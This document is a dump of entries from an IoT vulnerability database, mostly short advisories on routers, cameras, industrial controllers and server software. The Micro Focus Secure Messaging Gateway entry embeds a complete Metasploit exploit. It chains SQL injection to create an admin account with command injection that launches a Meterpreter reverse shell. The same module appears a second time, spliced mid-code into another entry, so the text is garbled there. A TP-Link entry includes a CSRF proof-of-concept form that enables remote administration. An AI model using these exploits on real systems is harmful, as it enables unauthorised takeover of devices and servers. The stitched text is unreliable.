VARIoT IoT vulnerabilities database

CSI-200EA measurement control device is mainly used in substation automation systems with voltage levels of 110kV and above. Sifang CSI-200EA measurement control device MMS protocol initialization has a denial of service vulnerability. An attacker sends an illegally initialized specific message of the MMS protocol, causing the device port to close

The Cisco RV110W is a VPN firewall wireless router that can fully meet the development needs of small and medium-sized enterprises. It integrates many functions such as wired / wireless network connection, VPN, firewall, etc., and perfectly integrates remote connection, remote login, wireless transmission and data security. One net. The Cisco RV110W router has a buffer overflow vulnerability. An attacker could use the vulnerability to cause the router to restart automatically.

CSI-200EA measurement control device is mainly used in substation automation systems with voltage levels of 110kV and above. There is a denial of service vulnerability in the IP protocol fragment of the Quartet CSI-200EA measurement and control device. By sending illegal IP fragment packets, an attacker can cause the network function of the device to enter an unstable state, which in turn can cause the device to become abnormal and enter an intermittent network service interruption state

An OS command injection vulnerability in the web administration component of Micro Focus Secure Messaging Gateway (SMG) allows a remote attacker authenticated as a privileged user to execute arbitrary OS commands on the SMG server. This can be exploited in conjunction with CVE-2018-12464 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that used GWAVA product name (i.e. GWAVA 6.5). The product includes functions such as virus protection, anti-spam, anti-DDos attack and image analysis. Web administration is one of the Web-based management components. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "MicroFocus Secure Messaging Gateway Remote Code Execution", 'Description' => %q{ This module exploits a SQL injection and command injection vulnerability in MicroFocus Secure Messaging Gateway. An unauthenticated user can execute a terminal command under the context of the web user. One of the user supplied parameters of API endpoint is used by the application without input validation and/or parameter binding, which leads to SQL injection vulnerability. Successfully exploiting this vulnerability gives a ability to add new user onto system. manage_domains_dkim_keygen_request.php endpoint is responsible for executing an operation system command. It's not possible to access this endpoint without having a valid session. Combining these vulnerabilities gives the opportunity execute operation system commands under the context of the web user. }, 'License' => MSF_LICENSE, 'Author' => [ 'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module ], 'References' => [ ['URL', 'https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/'], ['CVE', '2018-12464'], ['CVE', '2018-12465'], ['URL', 'https://support.microfocus.com/kb/doc.php?id=7023132'], ['URL', 'https://support.microfocus.com/kb/doc.php?id=7023133'] ], 'DefaultOptions' => { 'Payload' => 'php/meterpreter/reverse_tcp', 'Encoder' => 'php/base64' }, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [[ 'Automatic', { }]], 'Privileged' => false, 'DisclosureDate' => "Jun 19 2018", 'DefaultTarget' => 0 )) register_options( [ OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']) ] ) end def execute_query(query) # # We have a very rare SQLi case in here. Normally, it's would be very easy to exploit it by using time-based techniques # but since we are able to use stacked-query approach, following form of payload is required in order to be able # get back the output of query ! # sql = rand_text_alphanumeric(3 + rand(3)) sql << "') LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressPlain ON ScanEngineBindAddressPlain.idScanEngine=ScanEngineProperty.idScanEngine " sql << "LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressSsl ON ScanEngineBindAddressSsl.idScanEngine=ScanEngineProperty.idScanEngine " sql << "LEFT JOIN ScanEngineProperty AS ScanEngineEnableSsl ON ScanEngineEnableSsl.idScanEngine=ScanEngineProperty.idScanEngine; " sql << query sql << "; -- " sql << rand_text_alphanumeric(3 + rand(3)) send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'api', '1', 'enginelist.php'), 'vars_post' => { 'appkey' => sql } ) end def something_went_wrong fail_with Failure::Unknown, 'Something went wrong' end def check r = rand_text_numeric(15..35) res = execute_query("SELECT #{r}") unless res vprint_error 'Connection failed' return CheckCode::Unknown end unless res.code == 200 && res.body.include?(r) return CheckCode::Safe end CheckCode::Vulnerable end def implant_payload(cookie) print_status('Creating a domain record with a malformed DKIM data') p = [ { :id => 'temp_0', :Description => rand_text_alpha(5), :DkimList => [ { :Domain => "$(php -r '#{payload.encoded}')", :Selector => '', :TempId => 'tempDkim_1' } ] } ].to_json res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_save_data.json.php'), 'cookie' => cookie, 'vars_get' => { 'cache' => 0, }, 'vars_post' => { 'StateData' => '[{"ouid":1}]', 'SaveData' => p } }) if res && res.code == 200 && res.body.include?('DbNodeId') # Defining as global variable since we need to access them later within clean up function. begin @domainid = res.get_json_document['Nodes'][0]['DbNodeId'] @dkimid = res.get_json_document['Nodes'][1]['DbNodeId'] rescue => e fail_with Failure::UnexpectedReply, "Something went horribly wrong while implanting the payload : #{e.message}" end print_good('Payload is successfully implanted') else something_went_wrong end end def create_user # We need to create an user by exploiting SQLi flaws so we can reach out to cmd injection # issue location where requires a valid session ! print_status('Creating a user with appropriate privileges') # Defining as global variable since we need to access them later within clean up function. @username = rand_text_alpha_lower(5..25) @userid = rand_text_numeric(6..8) query = "INSERT INTO account VALUES (#{@userid}, 1, '#{@username}', '0', '', 1,61011);INSERT INTO UserRole VALUES (#{@userid},#{@userid},1),(#{@userid.to_i-1},#{@userid},2)" execute_query(query) res = execute_query("SELECT * FROM account WHERE loginname = '#{@username}'") if res && res.code == 200 && res.body.include?(@username) print_good("User successfully created. Username : #{@username}") else something_went_wrong end end def login print_status("Authenticating with created user") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'security', 'securitygate.php'), 'vars_post' => { 'username' => @username, 'password' => rand_text_alpha_lower(5..25), 'passwordmandatory' => rand_text_alpha_lower(5..25), 'LimitInterfaceId' => 1 } ) if res && res.code == 200 && res.body.include?('/ui/default/index.php') print_good('Successfully authenticated') cookie = res.get_cookies else something_went_wrong end cookie end def exploit unless check == CheckCode::Vulnerable fail_with Failure::NotVulnerable, 'Target is not vulnerable' end create_user cookie = login implant_payload(cookie) print_status('Triggering an implanted payload') send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_dkim_keygen_request.php'), 'cookie' => cookie, 'vars_get' => { 'cache' => 0, }, 'vars_post' => { 'DkimRecordId' => @dkimid } }) end def on_new_session(session) print_status('Cleaning up...') cmd = "" cmd << 'PGPASSWORD=postgres psql -U postgres -d SecureGateway -c "' cmd << "DELETE FROM account WHERE loginname ='#{@username}';" cmd << "DELETE FROM UserRole WHERE idaccount = #{@userid};" cmd << "DELETE FROM Domain WHERE iddomain = #{@domainid};" cmd << "DELETE FROM DkimSignature WHERE iddkimsignature = #{@dkimid};" cmd << '"' session.shell_command_token(cmd) end end

CSRF exists for all actions in the web interface on TP-Link TL-WR841N v13 00000001 0.9.1 4.16 v0001.0 Build 180119 Rel.65243n devices. TP-Link TL-WR841N Contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The TP-LinkTL-WR841Nv13 is a wireless router device. TP-LinkTL-WR841Nv13 has a cross-site request forgery vulnerability, and an attacker can perform arbitrary operations on behalf of the authenticated user. * Vulnerability: Cross-Site Request Forgery * Affected Software: TP-Link TL-WR841N v13 * Affected Version: 0.9.1 4.16 v0001.0 Build 180119 Rel.65243n * Patched Version: None * Risk: High * Vendor Contacted: 05/20/2018 * Vendor Fix: None * Public Disclosure: 06/27/2018 ##### Overview The web interface of the router is vulnerable to CSRF. ##### CVSS High 8.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H ##### Details The protection mechanism that is in place against CSRF checks if the given "referer" header starts with "192.168.0.1". If it does, the request is accepted. An attacker can bypass this mechanism by prepending their domain with this string. For example, the malicious HTML and JavaScript code could be hosted at "192.168.0.1.example.com". Alternatively, an attack could originate from a different IP in the internal network, eg "192.168.0.11". ##### Proof of Concept Enable remote access: <html> <body> <form action="http://192.168.0.1/cgi?2&2" method="POST" enctype="text/plain"> <input type="hidden" name="&#91;HTTP&#95;CFG&#35;0&#44;0&#44;0&#44;0&#44;0&#44;0&#35;0&#44;0&#44;0&#44;0&#44;0&#44;0&#93;0&#44;2&#13;&#10;httpRemoteEnabled" value="1&#13;&#10;httpRemotePort&#61;7777&#13;&#10;&#91;APP&#95;CFG&#35;0&#44;0&#44;0&#44;0&#44;0&#44;0&#35;0&#44;0&#44;0&#44;0&#44;0&#44;0&#93;1&#44;1&#13;&#10;remoteHost&#61;255&#46;255&#46;255&#46;255&#13;&#10;" /> <input type="submit" value="Submit request" /> </form> </body> </html> The code would be hosted at a subdomain which starts with "192.168.0.1", eg "192.168.0.1.example.com". ##### Request POST /cgi?2&2 HTTP/1.1 Host: 192.168.0.1 User-Agent: [...] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.0.1.example.com/csrf.html Content-Type: text/plain Content-Length: 147 Cookie: Authorization=Basic [...] DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 [HTTP_CFG#0,0,0,0,0,0#0,0,0,0,0,0]0,2 httpRemoteEnabled=1 httpRemotePort=7777 [APP_CFG#0,0,0,0,0,0#0,0,0,0,0,0]1,1 remoteHost=255.255.255.255 HTTP/1.1 200 OK Content-Type: text/plain; charset=utf-8 Connection: close Content-Length: 8 [error]0 ##### Solution The vendor did not fix the issue. Users of the product can try to mitigate the issue by not visiting other websites while being signed into the web interface and signing out as soon as possible. Additionally, various browser plugins can be used to try to defend against attacks. ##### Timeline - 05/20/2018 Requested email address via contact form (no response) - 05/24/2018 Send advisory to security@tp-link.com asking for confirmation, set disclosure date (no response) - 06/01/2018 Asked for confirmation at support.usa@tp-link.com - 06/04/2018 Vendor confirmed receipt of advisory - 06/12/2018 Requested Status Update - 06/14/2018 Vendor claims they never received advisory - 06/14/2018 Resend advisory asking for confirmation (no response) - 06/18/2018 Reminded vendor of disclosure date (no response) - 06/18/2018 Requested CVE - 06/19/2018 CVE assigned - 06/27/2018 Disclosure -- PGP Key: https://pgp.mit.edu/pks/lookup?op=get&search=0xFD8E2B9091A24C75

BWS Systems HA-Bridge devices allow remote attackers to obtain potentially sensitive information via a direct request for the #!/system URI. BWS Systems HA-Bridge The device contains an information disclosure vulnerability.Information may be obtained. A security vulnerability exists in the BWSSystemsHA-Bridge device. BWS Systems HA-Bridge devices is a product used to automatically connect and control IoT devices. There are security vulnerabilities in BWS Systems HA-Bridge equipment

Northern Electric & Power (NEP) inverter devices allow remote attackers to obtain potentially sensitive information via a direct request for the nep/status/index/1 URI. A security hole exists in the NEPinverter device

Electro Industries GaugeTech Nexus devices allow remote attackers to obtain potentially sensitive information via a direct request for the meter_information.htm, diag_system.htm, or diag_dnp_lan_wan.htm URI. ElectroIndustriesGaugeTechNexusdevices is a utility billing device with advanced communication capabilities from ElectroIndustriesGaugeTech, USA. There is a security hole in the ElectroIndustriesGaugeTechNexus device

Emerson Liebert IntelliSlot Web Card devices allow remote attackers to reconfigure access control via the config/configUser.htm or config/configTelnet.htm URI. EmersonLiebertIntelliSlotWebCarddevices is an intelligent network card product from Emerson Electric. A security vulnerability exists in the EmersonLiebert IntelliSlotWebCard device

Brickstream 2300 devices allow remote attackers to obtain potentially sensitive information via a direct request for the basic.html#ipsettings or basic.html#datadelivery URI. Brickstream 2300 The device contains an information disclosure vulnerability.Information may be obtained. Brickstream2300devices is a traffic statistics and analysis sensor device. A security vulnerability exists in the Brickstream 2300 device

WRT-AC66U is a router product of ASUS. A cross-site scripting vulnerability exists in ASUSWRT-AC66U3.x, which allows remote attackers to inject malicious script code into the application side of a vulnerable feature or service module.

Baseon Lantronix MSS devices do not require a password for TELNET access. Baseon Lantronix MSS The device contains an access control vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. BaseonLantronixMSSdevices is a serial communication server device from Lantronix Corporation of the United States. An attacker could use this vulnerability to log in to TELNET

Pharos Controls devices allow remote attackers to obtain potentially sensitive information via a direct request for the default/index.lsp or default/log.lsp URI. Pharos Controls The device contains an information disclosure vulnerability.Information may be obtained. PharosControlsdevices is a lighting controller device from PharosArchitecturalControls, UK. There is a security hole in the PharosControls device

Sollae Serial-Ethernet-Module and Remote-I/O-Device-Server devices have a default password of sollae for the TELNET service. Sollae Serial-Ethernet-Module and Remote-I/O-Device-Server The device contains a vulnerability related to the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. SollaeSerial-Ethernet-Module and Remote-I/O-Device-Server are products of South Korea's SollaeSystems. SollaeSerial-Ethernet-Module is an Ethernet module that monitors serial devices over the network. Remote-I/O-Device-Server is a server device for remotely controlling and monitoring device I/O. A security vulnerability exists in the SollaeSerial-Ethernet-Module and Remote-I/O-Device-Server devices. An attacker could exploit the vulnerability to bypass authentication

The setSystemTime function in Foscam Cameras C1 Lite V3, and C1 V3 with firmware 2.82.2.33 and earlier, FI9800P V3, FI9803P V4, FI9851P V3, and FI9853EP V2 2.84.2.33 and earlier, FI9816P V3, FI9821EP V2, FI9821P V3, FI9826P V3, and FI9831P V3 2.81.2.33 and earlier, C1, C1 V2, C1 Lite, and C1 Lite V2 2.52.2.47 and earlier, FI9800P, FI9800P V2, FI9803P V2, FI9803P V3, and FI9851P V2 2.54.2.47 and earlier, FI9815P, FI9815P V2, FI9816P, and FI9816P V2, 2.51.2.47 and earlier, R2 and R4 2.71.1.59 and earlier, C2 and FI9961EP 2.72.1.59 and earlier, FI9900EP, FI9900P, and FI9901EP 2.74.1.59 and earlier, FI9928P 2.74.1.58 and earlier, FI9803EP and FI9853EP 2.22.2.31 and earlier, FI9803P and FI9851P 2.24.2.31 and earlier, FI9821P V2, FI9826P V2, FI9831P V2, and FI9821EP 2.21.2.31 and earlier, FI9821W V2, FI9831W, FI9826W, FI9821P, FI9831P, and FI9826P 2.11.1.120 and earlier, FI9818W V2 2.13.2.120 and earlier, FI9805W, FI9804W, FI9804P, FI9805E, and FI9805P 2.14.1.120 and earlier, FI9828P, and FI9828W 2.13.1.120 and earlier, and FI9828P V2 2.11.1.133 and earlier allows remote authenticated users to execute arbitrary commands via a ';' in the ntpServer argument. NOTE: this issue exists because of an incomplete fix for CVE-2017-2849. plural Foscam The camera contains a command injection vulnerability. This vulnerability CVE-2017-2849 Due to an incomplete fix.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Foscomm (FOSCAM) is a safe living brand under the Shenzhen Foscom Intelligent Technology Co., Ltd., covering network video surveillance products (webcam, hard disk recorder, monitoring kit), video cloud storage services. The Foscom Foscam camera has a command injection vulnerability that stems from an attacker gaining administrator credentials that can be exploited as the root user to perform privilege escalation. are network camera products of China Foscam (FOSCAM) company. A security vulnerability exists in the 'setSystemTime' function in several Foscam Cameras products. A remote attacker can use the ';' in the ntpServer parameter to exploit this vulnerability to execute arbitrary commands

Stack-based buffer overflow in the getSWFlag function in Foscam Cameras C1 Lite V3, and C1 V3 with firmware 2.82.2.33 and earlier, FI9800P V3, FI9803P V4, FI9851P V3, and FI9853EP V2 2.84.2.33 and earlier, FI9816P V3, FI9821EP V2, FI9821P V3, FI9826P V3, and FI9831P V3 2.81.2.33 and earlier, C1, C1 V2, C1 Lite, and C1 Lite V2 2.52.2.47 and earlier, FI9800P, FI9800P V2, FI9803P V2, FI9803P V3, and FI9851P V2 2.54.2.47 and earlier, FI9815P, FI9815P V2, FI9816P, and FI9816P V2, 2.51.2.47 and earlier, R2 and R4 2.71.1.59 and earlier, C2 and FI9961EP 2.72.1.59 and earlier, FI9900EP, FI9900P, and FI9901EP 2.74.1.59 and earlier, FI9928P 2.74.1.58 and earlier, FI9803EP and FI9853EP 2.22.2.31 and earlier, FI9803P and FI9851P 2.24.2.31 and earlier, FI9821P V2, FI9826P V2, FI9831P V2, and FI9821EP 2.21.2.31 and earlier, FI9821W V2, FI9831W, FI9826W, FI9821P, FI9831P, and FI9826P 2.11.1.120 and earlier, FI9818W V2 2.13.2.120 and earlier, FI9805W, FI9804W, FI9804P, FI9805E, and FI9805P 2.14.1.120 and earlier, FI9828P, and FI9828W 2.13.1.120 and earlier, and FI9828P V2 2.11.1.133 and earlier allows remote attackers to cause a denial of service (crash and reboot), via the callbackJson parameter. plural Foscam The product contains a buffer error vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Foscomm (FOSCAM) is a safe living brand under the Shenzhen Foscom Intelligent Technology Co., Ltd., covering network video surveillance products (webcam, hard disk recorder, monitoring kit), video cloud storage services. The Foscom Foscam camera has a stack buffer overflow vulnerability that allows an attacker to exploit the vulnerability to crash the device's webService process. Foscam Cameras C1 Lite V3 etc. are network camera products of China Foscam (FOSCAM) company. A remote attacker could use the 'callbackJson' parameter to cause a denial of service (crash and restart)

Directory traversal vulnerability in Foscam Cameras C1 Lite V3, and C1 V3 with firmware 2.82.2.33 and earlier, FI9800P V3, FI9803P V4, FI9851P V3, and FI9853EP V2 2.84.2.33 and earlier, FI9816P V3, FI9821EP V2, FI9821P V3, FI9826P V3, and FI9831P V3 2.81.2.33 and earlier, C1, C1 V2, C1 Lite, and C1 Lite V2 2.52.2.47 and earlier, FI9800P, FI9800P V2, FI9803P V2, FI9803P V3, and FI9851P V2 2.54.2.47 and earlier, FI9815P, FI9815P V2, FI9816P, and FI9816P V2, 2.51.2.47 and earlier, R2 and R4 2.71.1.59 and earlier, C2 and FI9961EP 2.72.1.59 and earlier, FI9900EP, FI9900P, and FI9901EP 2.74.1.59 and earlier, FI9928P 2.74.1.58 and earlier, FI9803EP and FI9853EP 2.22.2.31 and earlier, FI9803P and FI9851P 2.24.2.31 and earlier, FI9821P V2, FI9826P V2, FI9831P V2, and FI9821EP 2.21.2.31 and earlier, FI9821W V2, FI9831W, FI9826W, FI9821P, FI9831P, and FI9826P 2.11.1.120 and earlier, FI9818W V2 2.13.2.120 and earlier, FI9805W, FI9804W, FI9804P, FI9805E, and FI9805P 2.14.1.120 and earlier, FI9828P, and FI9828W 2.13.1.120 and earlier, and FI9828P V2 2.11.1.133 and earlier allows remote attackers to delete arbitrary files via a .. (dot dot) in the URI path component. plural Foscam Camera The product contains a path traversal vulnerability.Information may be tampered with. Foscomm (FOSCAM) is a safe living brand under the Shenzhen Foscom Intelligent Technology Co., Ltd., covering network video surveillance products (webcam, hard disk recorder, monitoring kit), video cloud storage services. Any file deletion vulnerability in the Foscom Foscam camera allows an attacker to delete any file in the camera's file system by making a special GET request for the camera's web management interface. are network camera products of China Foscam (FOSCAM) company. A directory traversal vulnerability exists in several Foscam products. An attacker could exploit this vulnerability to delete arbitrary files

A SQL injection vulnerability in the web administration and quarantine components of Micro Focus Secure Messaging Gateway allows an unauthenticated remote attacker to execute arbitrary SQL statements against the database. This can be exploited to create an administrative account and used in conjunction with CVE-2018-12465 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that use the GWAVA product name (i.e. GWAVA 6.5). Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The product includes functions such as virus protection, anti-spam, anti-DDos attack and image analysis. Web administration is one of the Web-based management components; quarantine is one of the file isolation components. An unauthenticated user can execute a terminal command under the context of the web user. One of the user supplied parameters of API endpoint is used by the application without input validation and/or parameter binding, which leads to SQL injection vulnerability. Successfully exploiting this vulnerability gives a ability to add new user onto system. manage_domains_dkim_keygen_request.php endpoint is responsible for executing an operation system command. It's not possible to access this endpoint without having a valid session. Combining these vulnerabilities gives the opportunity execute operation system commands under the context of the web user. }, 'License' => MSF_LICENSE, 'Author' => [ 'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module ], 'References' => [ ['URL', 'https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/'], ['CVE', '2018-12464'], ['CVE', '2018-12465'], ['URL', 'https://support.microfocus.com/kb/doc.php?id=7023132'], ['URL', 'https://support.microfocus.com/kb/doc.php?id=7023133'] ], 'DefaultOptions' => { 'Payload' => 'php/meterpreter/reverse_tcp', 'Encoder' => 'php/base64' }, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [[ 'Automatic', { }]], 'Privileged' => false, 'DisclosureDate' => "Jun 19 2018", 'DefaultTarget' => 0 )) register_options( [ OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']) ] ) end def execute_query(query) # # We have a very rare SQLi case in here. Normally, it's would be very easy to exploit it by using time-based techniques # but since we are able to use stacked-query approach, following form of payload is required in order to be able # get back the output of query ! # sql = rand_text_alphanumeric(3 + rand(3)) sql << "') LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressPlain ON ScanEngineBindAddressPlain.idScanEngine=ScanEngineProperty.idScanEngine " sql << "LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressSsl ON ScanEngineBindAddressSsl.idScanEngine=ScanEngineProperty.idScanEngine " sql << "LEFT JOIN ScanEngineProperty AS ScanEngineEnableSsl ON ScanEngineEnableSsl.idScanEngine=ScanEngineProperty.idScanEngine; " sql << query sql << "; -- " sql << rand_text_alphanumeric(3 + rand(3)) send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'api', '1', 'enginelist.php'), 'vars_post' => { 'appkey' => sql } ) end def something_went_wrong fail_with Failure::Unknown, 'Something went wrong' end def check r = rand_text_numeric(15..35) res = execute_query("SELECT #{r}") unless res vprint_error 'Connection failed' return CheckCode::Unknown end unless res.code == 200 && res.body.include?(r) return CheckCode::Safe end CheckCode::Vulnerable end def implant_payload(cookie) print_status('Creating a domain record with a malformed DKIM data') p = [ { :id => 'temp_0', :Description => rand_text_alpha(5), :DkimList => [ { :Domain => "$(php -r '#{payload.encoded}')", :Selector => '', :TempId => 'tempDkim_1' } ] } ].to_json res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_save_data.json.php'), 'cookie' => cookie, 'vars_get' => { 'cache' => 0, }, 'vars_post' => { 'StateData' => '[{"ouid":1}]', 'SaveData' => p } }) if res && res.code == 200 && res.body.include?('DbNodeId') # Defining as global variable since we need to access them later within clean up function. begin @domainid = res.get_json_document['Nodes'][0]['DbNodeId'] @dkimid = res.get_json_document['Nodes'][1]['DbNodeId'] rescue => e fail_with Failure::UnexpectedReply, "Something went horribly wrong while implanting the payload : #{e.message}" end print_good('Payload is successfully implanted') else something_went_wrong end end def create_user # We need to create an user by exploiting SQLi flaws so we can reach out to cmd injection # issue location where requires a valid session ! print_status('Creating a user with appropriate privileges') # Defining as global variable since we need to access them later within clean up function. @username = rand_text_alpha_lower(5..25) @userid = rand_text_numeric(6..8) query = "INSERT INTO account VALUES (#{@userid}, 1, '#{@username}', '0', '', 1,61011);INSERT INTO UserRole VALUES (#{@userid},#{@userid},1),(#{@userid.to_i-1},#{@userid},2)" execute_query(query) res = execute_query("SELECT * FROM account WHERE loginname = '#{@username}'") if res && res.code == 200 && res.body.include?(@username) print_good("User successfully created. Username : #{@username}") else something_went_wrong end end def login print_status("Authenticating with created user") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'security', 'securitygate.php'), 'vars_post' => { 'username' => @username, 'password' => rand_text_alpha_lower(5..25), 'passwordmandatory' => rand_text_alpha_lower(5..25), 'LimitInterfaceId' => 1 } ) if res && res.code == 200 && res.body.include?('/ui/default/index.php') print_good('Successfully authenticated') cookie = res.get_cookies else something_went_wrong end cookie end def exploit unless check == CheckCode::Vulnerable fail_with Failure::NotVulnerable, 'Target is not vulnerable' end create_user cookie = login implant_payload(cookie) print_status('Triggering an implanted payload') send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_dkim_keygen_request.php'), 'cookie' => cookie, 'vars_get' => { 'cache' => 0, }, 'vars_post' => { 'DkimRecordId' => @dkimid } }) end def on_new_session(session) print_status('Cleaning up...') cmd = "" cmd << 'PGPASSWORD=postgres psql -U postgres -d SecureGateway -c "' cmd << "DELETE FROM account WHERE loginname ='#{@username}';" cmd << "DELETE FROM UserRole WHERE idaccount = #{@userid};" cmd << "DELETE FROM Domain WHERE iddomain = #{@domainid};" cmd << "DELETE FROM DkimSignature WHERE iddkimsignature = #{@dkimid};" cmd << '"' session.shell_command_token(cmd) end end

On BIG-IP 13.1.0-13.1.0.7, a remote attacker using undisclosed methods against virtual servers configured with a Client SSL or Server SSL profile that has the SSL Forward Proxy feature enabled can force the Traffic Management Microkernel (tmm) to leak memory. As a result, system memory usage increases over time, which may eventually cause a decrease in performance or a system reboot due to memory exhaustion. BIG-IP Contains a resource exhaustion vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. F5 BIG-IP LTM, etc. are all products of F5 Company in the United States. F5 BIG-IP LTM is a local traffic manager; BIG-IP AAM is an application acceleration manager. Security flaws exist in several F5 products. The following products and versions are affected: F5 LTM version 13.1.0 to 13.1.0.7; AAM version 13.1.0 to 13.1.0.7; AFM version 13.1.0 to 13.1.0.7; Analytics 13.1.0 to 13.1.0.7 Versions; APM 13.1.0 to 13.1.0.7; ASM 13.1.0 to 13.1.0.7; DNS 13.1.0 to 13.1.0.7; Edge Gateway 13.1.0 to 13.1.0.7; GTM 13.1. 0 to 13.1.0.7; Link Controller 13.1.0 to 13.1.0.7; PEM 13.1.0 to 13.1.0.7; WebAccelerator 13.1.0 to 13.1.0.7; WebSafe 13.1.0 to 13.1. Version 0.7

In SwiftNIO before 1.8.0, a buffer overflow was addressed with improved size validation. SwiftNIO Contains a buffer overflow vulnerability due to a lack of size verification.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Apple SwiftNIO is prone to a buffer-overflow vulnerability because they fail to adequately bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. Attackers can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. Versions prior to SwiftNIO 1.8.0 are vulnerable. Apple SwiftNIO is a set of cross-platform asynchronous event-driven open source network application framework written by Apple (Apple). A remote attacker could exploit this vulnerability to overwrite arbitrary memory. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 APPLE-SA-2018-06-27-1 SwiftNIO 1.8.0 SwiftNIO 1.8.0 is now available and addresses the following: SwiftNIO Available for: macOS Sierra 10.12 and later, Ubuntu 14.04 and later Impact: A remote attacker may be able to overwrite arbitrary memory Description: A buffer overflow was addressed with improved size validation. CVE-2018-4281: Apple The following versions also contain the security content of SwiftNIO 1.8.0: 1.0.1, 1.1.1, 1.2.2, 1.3.2, 1.4.3, 1.5.2, 1.6.2, 1.7.3. Installation note: SwiftNIO 1.8.0 may be obtained via Swift Package Manager. Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 and https://github.com/apple/swift-nio/releases/tag/1.8.0. This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- iQJdBAEBCABHFiEEfcwwPWJ3e0Ig26mf8ecVjteJiCYFAlszzrspHHByb2R1Y3Qt c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQ8ecVjteJiCYczQ// bAlQPEBKRG482pKuKfKRXXjBDazu8zTiqsz1sHibYrtGCvNsApIhYOcDuUDKm8ey vk9DDmrcpI9gfxM975077qpnLjSAkpnPB60MRwxceWsNVnXhiLyU0+Fx5yQ2X6ey BhkY5Et+FhgLmrgr/nHb9IFkGGuUnDtNjN7N/GU7hyaGyxeYdfNFHMIUF/BGKroC 3VpD30hxZKFQjLUUXPKSy5oa6jD6FiXEDQmKdBbCpTvIj/f2GUgDkk+ErzzOBCjh Et6BC9QM4qleOzzJu9+8YlCyj2XOuGkWsVs6SMPmpP+mz+1/bDgzmy8hcWSb6cmo rEnE40t3jNHbw23jX9Xu7Fm2OdXw327kERbiwFSOSxzQJh4UwIdz4y5phz29ify3 bXEoInDORhomZuMCiK7ZhjNHFTLNxI1XFbHjbpEEZUgVYRUkHO9kKP9hOzLV8Gu/ nw0MAI5n/8lzxyRdpcBcFPWuWkyOFlIve/1vTQgTOMwOXeUudE1Ps2EWPFZO/Hlh 9nEy+Cd7zngO2YCDFsAePJXJCeg5b4n2FBrd4B3/xDWpeyk8guewwV0uosdqJ6Ht YQMYXUDeT7OHu+31Wt/JNUORIRuaVVStkl3jyrZufS2cyqhkTFX3f/ng8/A1C708 FMLHzFNworXo006KAKYlEOuVIMqz0lM9l5TEwq9E3Qo= =iH/I -----END PGP SIGNATURE-----